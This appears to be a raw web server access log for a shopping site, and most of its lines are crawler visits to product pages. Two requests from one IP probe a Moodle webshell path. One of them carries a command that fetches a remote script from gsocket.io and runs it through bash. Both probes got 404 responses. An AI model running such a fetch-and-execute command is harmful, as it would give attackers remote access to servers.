74.7.242.31 - - [13/Feb/2026:17:16:43 +0000] "GET /buy.php?detail/29901579740929 HTTP/1.1" 200 118315 "https://mohamionline.com/buy.php?detail/01304735888657" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:46 +0000] "GET /buy.php?detail/00201465469795 HTTP/1.1" 200 119305 "https://mohamionline.com/buy.php?detail/22203777612894" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
167.172.79.34 - - [13/Feb/2026:17:16:52 +0000] "GET /lms/local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 404 - "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
74.7.242.31 - - [13/Feb/2026:17:16:49 +0000] "GET /buy.php?detail/07103172177235 HTTP/1.1" 200 119005 "https://mohamionline.com/buy.php?detail/09200709981396" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:52 +0000] "GET /buy.php?detail/18500422126242 HTTP/1.1" 200 120170 "https://mohamionline.com/buy.php?detail/18500442403696" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.182 - - [13/Feb/2026:17:16:56 +0000] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.242.31 - - [13/Feb/2026:17:16:55 +0000] "GET /buy.php?detail/17103276401099 HTTP/1.1" 200 124005 "https://mohamionline.com/buy.php?detail/17103261959393" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:58 +0000] "GET /buy.php?detail/01304747653664 HTTP/1.1" 200 118096 "https://mohamionline.com/buy.php?detail/013021949043" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:01 +0000] "GET /buy.php?detail/01304747388283 HTTP/1.1" 200 117785 "https://mohamionline.com/buy.php?detail/013021949043" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:04 +0000] "GET /buy.php?detail/00302602167938 HTTP/1.1" 200 123198 "https://mohamionline.com/buy.php?detail/00403016976485" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:07 +0000] "GET /buy.php?detail/01500662591952 HTTP/1.1" 200 121153 "https://mohamionline.com/buy.php?detail/01500360777446" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:10 +0000] "GET /buy.php?detail/01804285441321 HTTP/1.1" 200 119168 "https://mohamionline.com/buy.php?detail/01804360336058" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:13 +0000] "GET /buy.php?detail/22203013631413 HTTP/1.1" 200 128433 "https://mohamionline.com/buy.php?detail/22203016298020" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:17 +0000] "GET /buy.php?goods/018042854 HTTP/1.1" 200 119218 "https://mohamionline.com/buy.php?detail/01804285441321" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.244.66.200 - - [13/Feb/2026:17:17:21 +0000] "GET /index.php?option=com_k2&view=item&id=29:%D9%85%D8%B4%D9%83%D9%84%D9%87-&limitstart=101300 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
167.172.79.34 - - [13/Feb/2026:17:17:22 +0000] "GET /lms/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 - "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
114.119.153.209 - - [13/Feb/2026:17:17:23 +0000] "GET /goods.php?shop/pg/215warn/15069 HTTP/1.1" 404 - "http://mohamionline.com/goods.php?sitemap803.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.242.31 - - [13/Feb/2026:17:17:20 +0000] "GET /buy.php?detail/05901626091068 HTTP/1.1" 200 118580 "https://mohamionline.com/buy.php?detail/05903126155150" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:24 +0000] "GET /buy.php?detail/00203031925768 HTTP/1.1" 200 120766 "https://mohamionline.com/buy.php?detail/00201465469795" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:27 +0000] "GET /buy.php?detail/23500150529897 HTTP/1.1" 200 133252 "https://mohamionline.com/buy.php?detail/07103172177235" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:31 +0000] "GET /buy.php?detail/18500400046149 HTTP/1.1" 200 121231 "https://mohamionline.com/buy.php?detail/18500422126242" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:34 +0000] "GET /buy.php?jp/050030566.html HTTP/1.1" 200 136229 "https://mohamionline.com/buy.php?detail/17103276401099" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:37 +0000] "GET /buy.php?detail/01304704563280 HTTP/1.1" 200 118198 "https://mohamionline.com/buy.php?detail/01304747653664" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:40 +0000] "GET /buy.php?detail/17103303196566 HTTP/1.1" 200 122365 "https://mohamionline.com/buy.php?detail/17103276401099" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:44 +0000] "GET /buy.php?detail/00302626096216 HTTP/1.1" 200 137524 "https://mohamionline.com/buy.php?detail/00302602167938" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:47 +0000] "GET /buy.php?detail/00302626796036 HTTP/1.1" 200 119065 "https://mohamionline.com/buy.php?detail/00302602167938" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:49 +0000] "GET /buy.php?goods/018042806 HTTP/1.1" 200 119166 "https://mohamionline.com/buy.php?detail/01804285441321" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:53 +0000] "GET /buy.php?detail/24401458724942 HTTP/1.1" 200 119509 "https://mohamionline.com/buy.php?detail/01804285441321" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:17:56 +0000] "GET /buy.php?detail/01500573891715 HTTP/1.1" 200 129680 "https://mohamionline.com/buy.php?detail/01500662591952" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:00 +0000] "GET /buy.php?detail/00204916393006 HTTP/1.1" 200 121089 "https://mohamionline.com/buy.php?detail/00203031925768" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:02 +0000] "GET /buy.php?detail/17103302664176 HTTP/1.1" 200 121522 "https://mohamionline.com/buy.php?detail/17103276401099" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:06 +0000] "GET /buy.php?detail/04300410991163 HTTP/1.1" 200 120154 "https://mohamionline.com/buy.php?detail/00203031925768" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:09 +0000] "GET /buy.php?detail/00203075011150 HTTP/1.1" 200 121879 "https://mohamionline.com/buy.php?detail/00201465469795" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:12 +0000] "GET /buy.php?detail/03001023472716 HTTP/1.1" 200 118630 "https://mohamionline.com/buy.php?detail/03003419366600" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:15 +0000] "GET /buy.php?detail/17103306581731 HTTP/1.1" 200 120167 "https://mohamionline.com/buy.php?detail/17103303196566" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:18 +0000] "GET /buy.php?detail/11801068369491 HTTP/1.1" 200 128343 "https://mohamionline.com/buy.php?detail/18200858208034" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:21 +0000] "GET /buy.php?detail/00302612942940 HTTP/1.1" 200 118833 "https://mohamionline.com/buy.php?detail/00302626796036" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:25 +0000] "GET /buy.php?detail/03404156435654 HTTP/1.1" 200 128678 "https://mohamionline.com/buy.php?goods/018042806" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:28 +0000] "GET /buy.php?detail/24401731786191 HTTP/1.1" 200 119859 "https://mohamionline.com/buy.php?detail/24401458724942" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:31 +0000] "GET /buy.php?detail/00302613905854 HTTP/1.1" 200 120101 "https://mohamionline.com/buy.php?detail/00302626796036" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:34 +0000] "GET /buy.php?detail/00201226226931 HTTP/1.1" 200 120628 "https://mohamionline.com/buy.php?detail/00204916393006" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:38 +0000] "GET /buy.php?detail/27400093390122 HTTP/1.1" 200 151903 "https://mohamionline.com/buy.php?detail/17103302664176" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:41 +0000] "GET /buy.php?detail/04300469383621 HTTP/1.1" 200 120150 "https://mohamionline.com/buy.php?detail/04300410991163" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:44 +0000] "GET /buy.php?detail/00201189702101 HTTP/1.1" 200 121705 "https://mohamionline.com/buy.php?detail/00203075011150" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
114.119.144.143 - - [13/Feb/2026:17:18:49 +0000] "GET /goods.php?shop/pg/215sprinkle/37547 HTTP/1.1" 404 - "http://mohamionline.com/goods.php?sitemap803.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.242.31 - - [13/Feb/2026:17:18:47 +0000] "GET /buy.php?detail/03003400495066 HTTP/1.1" 200 116777 "https://mohamionline.com/buy.php?detail/03001023472716" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:50 +0000] "GET /buy.php?detail/00201190339056 HTTP/1.1" 200 120144 "https://mohamionline.com/buy.php?detail/00203075011150" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:53 +0000] "GET /buy.php?detail/11800984364911 HTTP/1.1" 200 119139 "https://mohamionline.com/buy.php?detail/11801068369491" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:56 +0000] "GET /buy.php?detail/17103248454535 HTTP/1.1" 200 123479 "https://mohamionline.com/buy.php?detail/17103306581731" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:18:59 +0000] "GET /buy.php?detail/15000792986412 HTTP/1.1" 200 124553 "https://mohamionline.com/buy.php?detail/04300410991163" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:02 +0000] "GET /buy.php?detail/08800720977057 HTTP/1.1" 200 129003 "https://mohamionline.com/buy.php?detail/03404156435654" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:06 +0000] "GET /buy.php?detail/24401731843830 HTTP/1.1" 200 119565 "https://mohamionline.com/buy.php?detail/24401458724942" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:10 +0000] "GET /buy.php?detail/21200996353239 HTTP/1.1" 200 118727 "https://mohamionline.com/buy.php?detail/00302613905854" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:13 +0000] "GET /buy.php?detail/27402470853598 HTTP/1.1" 200 123829 "https://mohamionline.com/buy.php?detail/27400093390122" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:16 +0000] "GET /buy.php?goods/043004854 HTTP/1.1" 200 120469 "https://mohamionline.com/buy.php?detail/04300469383621" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:19 +0000] "GET /buy.php?goods/056013540 HTTP/1.1" 200 120094 "https://mohamionline.com/buy.php?detail/00201189702101" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:23 +0000] "GET /buy.php?detail/068025787131 HTTP/1.1" 200 120010 "https://mohamionline.com/buy.php?detail/00201189702101" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:26 +0000] "GET /buy.php?goods/116018284 HTTP/1.1" 200 118968 "https://mohamionline.com/buy.php?detail/00201190339056" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:29 +0000] "GET /buy.php?detail/04300485981980 HTTP/1.1" 200 119729 "https://mohamionline.com/buy.php?detail/04300469383621" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:32 +0000] "GET /buy.php?detail/00201332863865 HTTP/1.1" 200 120313 "https://mohamionline.com/buy.php?detail/00201190339056" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:35 +0000] "GET /buy.php?detail/15104480805558 HTTP/1.1" 200 119843 "https://mohamionline.com/buy.php?detail/15000792986412" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:39 +0000] "GET /buy.php?detail/15000773604576 HTTP/1.1" 200 123196 "https://mohamionline.com/buy.php?detail/15000792986412" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:42 +0000] "GET /buy.php?detail/15000774337283 HTTP/1.1" 200 121619 "https://mohamionline.com/buy.php?detail/15000792986412" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:46 +0000] "GET /buy.php?detail/21200992331332 HTTP/1.1" 200 121602 "https://mohamionline.com/buy.php?detail/21200996353239" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:50 +0000] "GET /buy.php?detail/21200992071227 HTTP/1.1" 200 118473 "https://mohamionline.com/buy.php?detail/21200996353239" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:54 +0000] "GET /buy.php?goods/043004903 HTTP/1.1" 200 119188 "https://mohamionline.com/buy.php?goods/043004854" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:19:57 +0000] "GET /buy.php?detail/04300485472337 HTTP/1.1" 200 118425 "https://mohamionline.com/buy.php?goods/043004854" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
152.228.220.143 - - [13/Feb/2026:17:20:02 +0000] "GET /index.php?option=com_jcomments&task=rss&object_id=502&object_group=com_content&format=raw HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.66 Safari/537.36"
74.7.242.31 - - [13/Feb/2026:17:20:00 +0000] "GET /buy.php?goods/095024220 HTTP/1.1" 200 141110 "https://mohamionline.com/buy.php?detail/068025787131" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:03 +0000] "GET /buy.php?detail/04300486059648 HTTP/1.1" 200 120112 "https://mohamionline.com/buy.php?detail/04300469383621" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:07 +0000] "GET /buy.php?detail/17103275103098 HTTP/1.1" 200 126310 "https://mohamionline.com/buy.php?detail/17103248454535" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:10 +0000] "GET /buy.php?detail/04000572065416 HTTP/1.1" 200 118404 "https://mohamionline.com/buy.php?detail/00201332863865" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
114.119.136.141 - - [13/Feb/2026:17:20:14 +0000] "GET /goods.php?shop/pg/215required/48447 HTTP/1.1" 404 - "http://mohamionline.com/goods.php?sitemap803.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.242.31 - - [13/Feb/2026:17:20:13 +0000] "GET /buy.php?detail/12101814827280 HTTP/1.1" 200 122748 "https://mohamionline.com/buy.php?goods/056013540" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:17 +0000] "GET /buy.php?goods/079029771 HTTP/1.1" 200 118338 "https://mohamionline.com/buy.php?detail/15000773604576" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:20 +0000] "GET /buy.php?detail/15000626367557 HTTP/1.1" 200 123209 "https://mohamionline.com/buy.php?detail/15000773604576" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:23 +0000] "GET /buy.php?detail/11800984486550 HTTP/1.1" 200 126980 "https://mohamionline.com/buy.php?detail/11801068369491" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:26 +0000] "GET /buy.php?detail/21203888375693 HTTP/1.1" 200 122830 "https://mohamionline.com/buy.php?detail/21200992071227" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:30 +0000] "GET /buy.php?goods/035033083 HTTP/1.1" 200 119519 "https://mohamionline.com/buy.php?goods/043004903" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:33 +0000] "GET /buy.php?detail/06100042354487 HTTP/1.1" 200 118564 "https://mohamionline.com/buy.php?goods/043004903" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:36 +0000] "GET /buy.php?detail/20500418818742 HTTP/1.1" 200 119727 "https://mohamionline.com/buy.php?detail/04300485472337" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:40 +0000] "GET /buy.php?detail/00602225148028 HTTP/1.1" 200 119424 "https://mohamionline.com/buy.php?detail/04300486059648" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:44 +0000] "GET /buy.php?detail/17103233500617 HTTP/1.1" 200 123672 "https://mohamionline.com/buy.php?detail/17103275103098" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:48 +0000] "GET /buy.php?detail/10903767615756 HTTP/1.1" 200 120409 "https://mohamionline.com/buy.php?detail/04000572065416" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:52 +0000] "GET /buy.php?detail/29603796223903 HTTP/1.1" 200 119756 "https://mohamionline.com/buy.php?goods/095024220" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:56 +0000] "GET /buy.php?goods/079030834 HTTP/1.1" 200 121416 "https://mohamionline.com/buy.php?goods/079029771" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:20:58 +0000] "GET /buy.php?detail/23000663925723 HTTP/1.1" 200 121077 "https://mohamionline.com/buy.php?detail/15000626367557" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:21:02 +0000] "GET /buy.php?detail/07903083984791 HTTP/1.1" 200 122325 "https://mohamionline.com/buy.php?goods/079029771" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
47.82.11.140 - - [13/Feb/2026:17:21:04 +0000] "GET /shopdetail/117109270978 HTTP/1.1" 404 - "https://mohamionline.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
74.7.242.31 - - [13/Feb/2026:17:21:05 +0000] "GET /buy.php?detail/09203898885550 HTTP/1.1" 200 118197 "https://mohamionline.com/buy.php?detail/21203888375693" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:21:08 +0000] "GET /buy.php?detail/03503499655929 HTTP/1.1" 200 120268 "https://mohamionline.com/buy.php?goods/035033083" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
47.82.11.1 - - [13/Feb/2026:17:21:11 +0000] "GET /shopdetail/237109112785 HTTP/1.1" 404 - "https://mohamionline.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
